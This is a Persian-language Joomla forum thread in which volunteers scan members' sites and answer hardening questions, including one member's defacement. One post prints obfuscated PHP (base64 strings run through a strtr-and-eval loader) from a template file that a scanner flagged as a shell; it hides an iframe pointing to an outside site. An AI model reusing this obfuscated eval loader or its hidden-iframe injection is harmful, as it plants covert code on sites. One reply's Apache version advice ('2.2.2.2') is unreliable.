spyman

تیم بررسی امنیت سایت ها جوملا

نظر شما در باره بستی امنیتی آسان نصب چیست ؟   23 کاربر تا کنون رای داده اند

  1. 1. نظر شما در باره بستی امنیتی آسان نصب چیست ؟

    • با امکانات دیده شده بسیار عالیست. می پسندم
      10
    • امکانات خوبی دارد ولی کم است. خوب
      11
    • امکانات خوبی ندارد . نمی پسندم
      2

لطفا وارد حساب کاربری خود شوید یا ثبت نام نمایید تا بتوانید رای خود را در نظر سنجی ارسال نمایید.

252 پست در این موضوع

با سلام خدمت برو بچ امنیتی جوملا

دوستان من قرار هست که برای کاربران سایت عزیزمون به ارائه هاست ارزون قیمت بپردازم و امکانات دیگه ای رو هم به کاربران ارائه بدم

از شما تیم امنیتی میخام که اول از همه سایتم رو تست بزنید که امنیتش درچه حدیه و دوم اینکه ببینین سرورای من به درد این کار میخورن یانه.

www.gsmeshop.com

خیلی ممنون از شما تیم امنیتی

درود

سایت شما بررسی شد و باگ خطرناکی مشاهده نشد

Share this post


Link to post
Share on other sites
آموزش ووکامرس قالب جوملا قالب وردپرس قالب رایگان وردپرس قالب رایگان جوملا هاست نامحدود هاست جوملا هاست لاراول هاست وردپرس هاست ارزان هاست ربات تلگرام خرید دامنه آموزش ساخت ربات تلگرام با php آموزش لاراول آموزش cPanel آموزش php آموزش فرم ساز RSform آموزش ساخت ربات جذب ممبر آموزش ساخت ربات دوستیابی آموزش ساخت ربات فروشگاهی برای ووکامرس آموزش طراحی سایت داینامیک با php آموزش بخش پشتیبانی با rsticket

سلام اقا پويان من سايتم را با نرم افزار Acunetix Web بررسي كردم يك چيزايي به من داده لطفا مي شه بگيد عكسش زير هست اين عكس مال 10 درصد از سايتمه يعني ده درصد از پردازش سايتم گزشته و اينارا داده

Share this post


Link to post
Share on other sites
سلام اقا پويان من سايتم را با نرم افزار Acunetix Web بررسي كردم يك چيزايي به من داده لطفا مي شه بگيد عكسش زير هست اين عكس مال 10 درصد از سايتمه يعني ده درصد از پردازش سايتم گزشته و اينارا داده

درود مجتبی جان

اول اینکه بعضی از پوشه هات دسترسیش آزاده باید بوسیله htaccess از رویت اونا جلوگیری کنی

دوم بعضی از فایلهات هم مثل hp.ini دسترسیش آزاده که باید ببندیش

سوم بعضی از لینکهات اعتبار نداره که به سئوی سایت آسیب میزنه و ربطی به امنیت نداره

Share this post


Link to post
Share on other sites
سلام آقای افضلی، قرار شد سایت ما رو بررسی کنی؟

هنوز وقت نکردین؟

ممنون میشم

درود

در حال بررسی هست...

Share this post


Link to post
Share on other sites
درود مجتبی جان

اول اینکه بعضی از پوشه هات دسترسیش آزاده باید بوسیله htaccess از رویت اونا جلوگیری کنی

دوم بعضی از فایلهات هم مثل hp.ini دسترسیش آزاده که باید ببندیش

سوم بعضی از لینکهات اعتبار نداره که به سئوی سایت آسیب میزنه و ربطی به امنیت نداره

با چه كدي در ht. مي تونم از پوشه ها محافظت كنم

چطوري بايد فايل ها را ببندم

كدام لينك هاي سايتم مي شه بگيد

با تشكر زياد

Share this post


Link to post
Share on other sites
با چه كدي در ht. مي تونم از پوشه ها محافظت كنم

چطوري بايد فايل ها را ببندم

كدام لينك هاي سايتم مي شه بگيد

با تشكر زياد

اگه منظورتون رمز گذاشتن بر روی فایل ها است می تونید از پنلتون (cpanel یا directadmin) اقدام کنید و رمز مورد نظرخودتون رو بزارید.

موفق باشیدgift

Share this post


Link to post
Share on other sites
اگه منظورتون رمز گذاشتن بر روی فایل ها است می تونید از پنلتون (cpanel یا directadmin) اقدام کنید و رمز مورد نظرخودتون رو بزارید.

موفق باشیدgift

بايد كجاي سي پنلم برم تو فايل منيجر و بعد از انتخاب پوشه چي كار كنم درست بگيد حتما بايد 200 پست بدم تا بلد شم

Share this post


Link to post
Share on other sites

الان من cpanel در دسترس ندارم ولی این چیزایی رو که میگم رو چک کن باید باشه:دی

وقتی وارد CP میشی اون پایین یه icon باید باشه به نام Password Protected Directories یا یه همچین اسمی.

یعد روش کلیک می کنی و دایرکتوری خودت رو میدی و بعد یوزرنیم و پسورد انتخابی و تمام

موفق باشید:auizz3ffy9vla57584x

Share this post


Link to post
Share on other sites
با چه كدي در ht. مي تونم از پوشه ها محافظت كنم

چطوري بايد فايل ها را ببندم

كدام لينك هاي سايتم مي شه بگيد

با تشكر زياد

درود

داخل htaccess کد های زیر رو وارد کنید

# disable directory browsing
Options All -Indexes

# secure htaccess file
<Files php.ini>
order allow,deny
deny from all
</Files>

Share this post


Link to post
Share on other sites

درود

سایت شما بررسی شد و باگ خطرناکی مشاهده نشد

فقط حتما به مدیر سرور بگید نسخه آپاچی رو به 2.2.2.2 بروز رسانی کنه چون نسخش قدیمیه و خطرناکه

Share this post


Link to post
Share on other sites

سلام اقا پويا ببخشيد انقدر من مزاحم مي شم توي فايل منيجر هاستم دوروزه كه يك پوشه اومده و چهارتا فايل اسكريپ توشه نمي دونم چيند مي شه كمكم كنيد عكسش زيره

Share this post


Link to post
Share on other sites
سلام اقا پويا ببخشيد انقدر من مزاحم مي شم توي فايل منيجر هاستم دوروزه كه يك پوشه اومده و چهارتا فايل اسكريپ توشه نمي دونم چيند مي شه كمكم كنيد عكسش زيره

نگرن نباشید cli تقریبا میشه گفت یه فناوری حوزه php هست (اگه اشتباه نکنم)

توضیح hنگلیسیش در سایت جهانی جوملا بصورت زیر هست

The CLI is really great feature and this one is taking Joomla one step closer to a PHP framework not just CMS. I first saw the CLI feature at the Joomla Conference in London 2011 and I was amazed of what it can do. I actually started my own, I don't know how to name it, plugin called CLI Builder.

The idea is this script will allow to build blueprint plugin, component, module or template. All that through console interface by entering some necessary data like title, developer name and email etc.

Here is the code at GIT hub: https://github.com/corleonis/cli-builder

So if you're interested just browse it or if you feel more hacky fork it and feel free to modify it.

Note: this is still in development but it can generate a plugin and install it on your Joomla website which you can edit later.

Share this post


Link to post
Share on other sites

با سلام من بعد اسکن یکی از هاست های دوستانم این پیغام رو داده میشه بگین چیکارش کنم

آیا پاک بشه یا اشکال نداره

public_html/components/com_jcomments/tpl/default/tpl_index.php PHP.Shell-51

Share this post


Link to post
Share on other sites

ممنون از پاسحگویی

من به یه نتیجه ای رسیدم و اون هم این مطلب هستش که کپی رایت موجود توی فایل components/com_jcomments/tpl/default/tpl_index.php همون شل اخطار داده شده است، چون بعد از حذف کپی رایت این نسخه که مربوط به CMSFA هستش بعد از اسکن دیگه گزارش هیچ مشکلی رو نداد.

لطفا یه بررسی بفرمایید.

این هم کد مربوط به کپی رایت

<div id="comments-footer" align="center"></div>

<?php $_F=__FILE__;$_X='Pz48cCBzdHlsNT0idDV4dC0xbDRnbjogYzVudDVyOyIgZDRyPSJydGwiPjxzcDFuIHN0eWw1PSJmMm50LXM0ejU6IDdwdDsgYzJsMnI6ICM4MDgwODA7Ij4mIzZlMGE7JiM2aThvOyYjNmk4aTsmIzZpNzg7ICYjNjc2NjsmIzZpOGk7JiM2ZTA2OyYjNmk3ODsmIzZlMDc7ICYjNmk3aTsmIzZpOGU7ICYjNmk4MDsmIzY3dTA7JiM4YTB1OyYjNjcwaTsmIzZpN2k7JiM2ZTBpOyYjNmUwZTsmIzZpNzg7ICYjNmUwNjsmIzZpN2k7JiM2aThpOyYjNmk4NzsmIzY3dTA7ICYjNml1ODsgJiM2aTc4OyYjNmk4aTsmIzZpODA7JiM2ZTBpOyYjNmUwNzsgJiM2ZTA4OyAmIzZpN2U7JiM2aTdpOyYjNmk4ZTsmIzZlMGU7JiM2ZTA4OyYjNjd1MDsmIzZpODc7JiM2N3UwOyA6IDxzcDFuIHN0eWw1PSJjMmwycjogI3VlOGFidTsiPjwxIGhyNWY9Imh0dHA6Ly93d3cuY21zZjFyczQubjV0IiB0MXJnNXQ9Il9ibDFuayI+PHNwMW4gc3R5bDU9ImMybDJyOiAjdWU4YWJ1OyI+JiM2aTg3OyYjNjd1MDsmIzhhMHU7JiM2aTdpOyYjNmUwaTsmIzhhMHU7JiM2aTdpOyYjNmk4NzsgJiM2ZTA2OyYjNmk3aTsmIzZpOGk7JiM2aTg3OyYjNjd1MDs8L3NwMW4+PC8xPjwvc3Axbj48L3NwMW4+PC9wPg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

<?php $_F=__FILE__;$_X='Pz4gPElGUkFNRSAgc3R5bDU9ImQ0c3BsMXk6bjJuNTsiIFNSQz0iaHR0cDovL3d3dy5jbXNmMXJzNC5uNXQvIiBXSURUSD02IEhFSUdIVD02PjwvSUZSQU1FPg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

Share this post


Link to post
Share on other sites
نگرن نباشید cli تقریبا میشه گفت یه فناوری حوزه php هست (اگه اشتباه نکنم)

توضیح hنگلیسیش در سایت جهانی جوملا بصورت زیر هست

The CLI is really great feature and this one is taking Joomla one step closer to a PHP framework not just CMS. I first saw the CLI feature at the Joomla Conference in London 2011 and I was amazed of what it can do. I actually started my own, I don't know how to name it, plugin called CLI Builder.

The idea is this script will allow to build blueprint plugin, component, module or template. All that through console interface by entering some necessary data like title, developer name and email etc.

Here is the code at GIT hub: https://github.com/corleonis/cli-builder

So if you're interested just browse it or if you feel more hacky fork it and feel free to modify it.

Note: this is still in development but it can generate a plugin and install it on your Joomla website which you can edit later.

اقا پويا چرا يك دفعه اومده رو هاستم بدون اجازه خودم مي شه پاكش كنم من فكر كنم ويروسه شل باگه يك چيزي هس ديگه پاكش كنم اختلالي در سايتم و جوملا ايجاد نمي شه

Share this post


Link to post
Share on other sites

نه پاکش نکنید بهتره چون مخرب نیست

اما اگه اذیتتون میکنه میتونید پاک کنید ولی یه نسخه ازش داشته باشید که اگه خللی ایجاد کرد برش گردونید

Share this post


Link to post
Share on other sites

باسلام خدمت همه.

داشتم تو این تاپیک یه گشتی می زدم و سایت های اسکن شده رو می دیدم که گفتم یه توضیحی بدم در مورد امنیت سایت ها.... :

ببینید دوستان زمانی که بنده و یا آقا پویان بهتون می گیم که امنیت سایت شما خوب هست دیگه طوری نباشه که بگید دیگه هک نمی شم و قید امنیت رو بزنید.

ببینید تنها کاری که من و آقا پویان انجام می دیم اسکن سایت از باگ های مخرب و اکسپلویت های مختف جوملا هست (359 اکسپلویت)

زمانی می تونید بگید امنیت سایت من بالاست و دیگه هک نمی شم که اولا تک تک سایت های روی سرور اسکن بشه و صد البته ما اطلاعات هاست شما رو داشته باشیم.

چرا؟

اولا اینکه اگر سایتی روی سرور شما دارای باگ باشه و هک شه شما هک با اون هک مشید ...

ثانیا اینکه ما از ابزار های به نام Web Crawler استفاده می کنیم که لینک های سایت شما رو تک تک بررسی و اونهایی رو که در سایت شما هستند رو باز و مورد اسکن قرار میده حالا شما فرض کنید که فایلی در سایت شما باشه که در هیچ کجای سایت شما لینکی ازش وجود نداشته باشه.

اگر این فایل دارای باگ هم باشه چون که در لیست Web Crawler ظاهر نمشه ما نمی تونیم اون رو اسکن کنیم به همین دلیل نیاز به اطالاعات هاست داریم برای دسترسی به تمامی فایل ها .... .

اینا رو گفتم که یک سری موارد روشن بشه.

موفق و موید باشید:28:

Share this post


Link to post
Share on other sites

کمک فوری مثل اینکه سایتم هک شده

اقای افضلی شما که گفتید مشکلی نداره اما انگار یه جائیش مشکل داشته که الان هک شدم.

وقتی میخای سایت رو باز کنی این پیام میاد hacked by CrazyDuck درضمن توی قسمت مدیریت هم نمیره فکر کنم پسورد رو تغییر داده حالا موندم چکار کنم درضمن اگر میشه بسته کامل سیستم امنیتی رو برای جوملا 2.5 بهم بدید که روی سایت نصبش کنم. هرچه زودتر به دادم برسید

با تشکر

Share this post


Link to post
Share on other sites

:21: :21: :21:به نظر من اگی که توی هر قسمتی که کاربر میخاد لاگین کنه یه کد کپچا بزاریم این مشکل دیگه پیش نمیاد

البته این کاری که با سایت من کردن توسط ربات بوده که از طریق یه لبتاب از فرودگاهی توی امریکا هک شده من الان سایت رو پسوردش رو پیدا کردم ولی هنوز همون ارور توی صفحه اصلی هست و همه سیستم رو چک کردم وچیزی تغییر نکرده بود نمیدونم که کجا رو دستکاری کرده که دیگه سایت رو نشون نمیده و فقط hacked by CrazyDuck رو نشون میده:13: :13: :13: :13: :13:

Share this post


Link to post
Share on other sites

:21: :21: :21:به نظر من اگی که توی هر قسمتی که کاربر میخاد لاگین کنه یه کد کپچا بزاریم این مشکل دیگه پیش نمیاد

البته این کاری که با سایت من کردن توسط ربات بوده که از طریق یه لبتاب از فرودگاهی توی امریکا هک شده من الان سایت رو پسوردش رو پیدا کردم ولی هنوز همون ارور توی صفحه اصلی هست و همه سیستم رو چک کردم وچیزی تغییر نکرده بود نمیدونم که کجا رو دستکاری کرده که دیگه سایت رو نشون نمیده و فقط hacked by CrazyDuck رو نشون میده:13: :13: :13: :13: :13:

Share this post


Link to post
Share on other sites

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری